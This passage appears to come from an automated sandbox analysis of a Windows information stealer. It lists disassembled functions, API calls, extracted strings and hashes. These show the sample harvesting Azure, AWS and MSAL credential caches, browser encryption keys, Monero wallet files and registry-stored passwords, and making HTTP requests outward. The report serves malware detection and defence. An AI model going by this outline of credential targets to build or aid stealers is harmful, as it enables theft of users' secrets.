                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FC4EE5
                                • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC49B0
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD08D2), ref: 00FC49C5
                                • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC49E2
                                • Part of subcall function 00FC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00FC4A1E
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00DEE9F8), ref: 00FC4A4A
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00FD0FF8), ref: 00FC4A5C
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,?), ref: 00FC4A70
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00FD0FFC), ref: 00FC4A82
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,?), ref: 00FC4A96
                                • Part of subcall function 00FC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00FC4AAC
                                • Part of subcall function 00FC4910: DeleteFileA.KERNEL32(?), ref: 00FC4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 2bf25a91b5e3e1ce9392a953f75ac209d515d51985090d533d92e057e3e0da3c
                              • Instruction ID: f4ea907e1507a88e9f5b0c447088ffbbbe6a6a6aae349f495be3c230cacd900b
                              • Opcode Fuzzy Hash: 2bf25a91b5e3e1ce9392a953f75ac209d515d51985090d533d92e057e3e0da3c
                              • Instruction Fuzzy Hash: 1941EB7994020867C764F770ED5BFED3738AB64700F0444587249961C1EEB8ABC9EB92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FC906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: c54b3dde8ed9217351eed551a71ac5d2787b06a25da1d0a895712c40ce02fd7f
                              • Instruction ID: 00f5102f3e764b9dbdea188c04960e34b79214f6fb693fecbd2e699a7174e1bc
                              • Opcode Fuzzy Hash: c54b3dde8ed9217351eed551a71ac5d2787b06a25da1d0a895712c40ce02fd7f
                              • Instruction Fuzzy Hash: 2D711075900209ABCB18DFE4ED89FEDB7B8BF48700F14811CF519A7284DB79A945DB60
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 8016780d16bf68d3e6c3095108ad8a20efde23346f0c7f3f151311b5fb0b9352
                              • Instruction ID: 375b9023a76a356227f38f3f06603f758557a65a40eca00d8c1783ade78a543a
                              • Opcode Fuzzy Hash: 8016780d16bf68d3e6c3095108ad8a20efde23346f0c7f3f151311b5fb0b9352
                              • Instruction Fuzzy Hash: A312FB7180010D9BDB19EBA0DE93FEDB738AF14304F54415DE50666191EF387B4AEBA2
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB6280: InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                                • Part of subcall function 00FB6280: StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB6303
                                • Part of subcall function 00FB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                                • Part of subcall function 00FB6280: HttpOpenRequestA.WININET(00000000,GET,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB6385
                                • Part of subcall function 00FB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                                • Part of subcall function 00FB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5318
                              • lstrlen.KERNEL32(00000000), ref: 00FC532F
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00FC5364
                              • lstrlen.KERNEL32(00000000), ref: 00FC5383
                              • lstrlen.KERNEL32(00000000), ref: 00FC53AE
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 7f2a140c8daa57cfa41021b626bcc2ad1bc507e623a454ba8e8bb4c5336e54c7
                              • Instruction ID: 916985af4f851f57bad840034065e2fad83108bb4a1068ed6c4fdeb4a3c9de49
                              • Opcode Fuzzy Hash: 7f2a140c8daa57cfa41021b626bcc2ad1bc507e623a454ba8e8bb4c5336e54c7
                              • Instruction Fuzzy Hash: 7051B63091014AABCB18EF64DE97FED7779AF50304F50402CE40A5A592EF387A46EB62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: e82294908e89de7cc2de71234cf7d88b614ab8dca0f3e74afe3473533aeaa9ff
                              • Instruction ID: d2313abcbd82d37457e8b96582c3919d40ef69876f4e332392f42e1d5430c5cc
                              • Opcode Fuzzy Hash: e82294908e89de7cc2de71234cf7d88b614ab8dca0f3e74afe3473533aeaa9ff
                              • Instruction Fuzzy Hash: 1FC195B590011E9BCB18EF60DD8AFEA7378BF54304F00459CF11EA7181EA78AA95DF91
                              APIs
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC42EC
                              • lstrcat.KERNEL32(?,00DEE028), ref: 00FC430B
                              • lstrcat.KERNEL32(?,?), ref: 00FC431F
                              • lstrcat.KERNEL32(?,00DEDF80), ref: 00FC4333
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FC8D90: GetFileAttributesA.KERNEL32(00000000,?,00FB1B54,?,?,00FD564C,?,?,00FD0E1F), ref: 00FC8D9F
                                • Part of subcall function 00FB9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D39
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                                • Part of subcall function 00FC93C0: GlobalAlloc.KERNEL32(00000000,00FC43DD,00FC43DD), ref: 00FC93D3
                              • StrStrA.SHLWAPI(?,00DEE1C0), ref: 00FC43F3
                              • GlobalFree.KERNEL32(?), ref: 00FC4512
                                • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                                • Part of subcall function 00FB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                                • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                                • Part of subcall function 00FB9AC0: LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC44A3
                              • StrCmpCA.SHLWAPI(?,00FD08D1), ref: 00FC44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FC44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00FC44E5
                              • lstrcat.KERNEL32(00000000,00FD0FB8), ref: 00FC44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 8ff9fe050b2d506af0dd39db714c375eba17191fd9819b7c37d33911ceeb3399
                              • Instruction ID: 4907c561ce0da1e35de1b0cfd3b0d7698929122674a4df419e9315d7da7df9c7
                              • Opcode Fuzzy Hash: 8ff9fe050b2d506af0dd39db714c375eba17191fd9819b7c37d33911ceeb3399
                              • Instruction Fuzzy Hash: 42719672900209ABCB14EBA0DD8AFEE7779BF48300F04459CF61997181DA78EB45DF91
                              APIs
                                • Part of subcall function 00FB12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB12B4
                                • Part of subcall function 00FB12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FB12BB
                                • Part of subcall function 00FB12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FB12D7
                                • Part of subcall function 00FB12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FB12F5
                                • Part of subcall function 00FB12A0: RegCloseKey.ADVAPI32(?), ref: 00FB12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00FB134F
                              • lstrlen.KERNEL32(?), ref: 00FB135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00FB1377
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FB1465
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00FB14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: ad2eeb8f93a7e587542b84b912d6fe82616896c8632e6107816001cc863e58ed
                              • Instruction ID: 499ee8814e70509b2a5940584f15635a72e64ca4d3d89a95198321dce63f5a38
                              • Opcode Fuzzy Hash: ad2eeb8f93a7e587542b84b912d6fe82616896c8632e6107816001cc863e58ed
                              • Instruction Fuzzy Hash: BB5111B195011D97CB29EB60DD97FED733CAF54304F4041ACB60AA2081EE786B85DFA6
                              APIs
                                • Part of subcall function 00FB72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB733A
                                • Part of subcall function 00FB72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FB73B1
                                • Part of subcall function 00FB72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FB740D
                                • Part of subcall function 00FB72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FB7452
                                • Part of subcall function 00FB72D0: HeapFree.KERNEL32(00000000), ref: 00FB7459
                              • lstrcat.KERNEL32(00000000,00FD17FC), ref: 00FB7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FB7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00FB765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FB768F
                              • lstrcat.KERNEL32(00000000,00FD1804), ref: 00FB76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FB76D3
                              • lstrcat.KERNEL32(00000000,00FD1808), ref: 00FB76ED
                              • task.LIBCPMTD ref: 00FB76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: f420b6868061665dc96a231e4c55222be55dc5061dd36fa8fb35b1242e02ea1c
                              • Instruction ID: f0b4de491e221acd154f78deed544f5998dc977d2c433e1d6aa6f217fe8e3746
                              • Opcode Fuzzy Hash: f420b6868061665dc96a231e4c55222be55dc5061dd36fa8fb35b1242e02ea1c
                              • Instruction Fuzzy Hash: D7314DB2900209DBCB18EBA5EC85DEE7779BF84301F14412CE116A7284DA38A986EF51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00DEDF20,00000000,?,00FD0E2C,00000000,?,00000000), ref: 00FC8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00FC8158
                              • __aulldiv.LIBCMT ref: 00FC8172
                              • __aulldiv.LIBCMT ref: 00FC8180
                              • wsprintfA.USER32 ref: 00FC81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
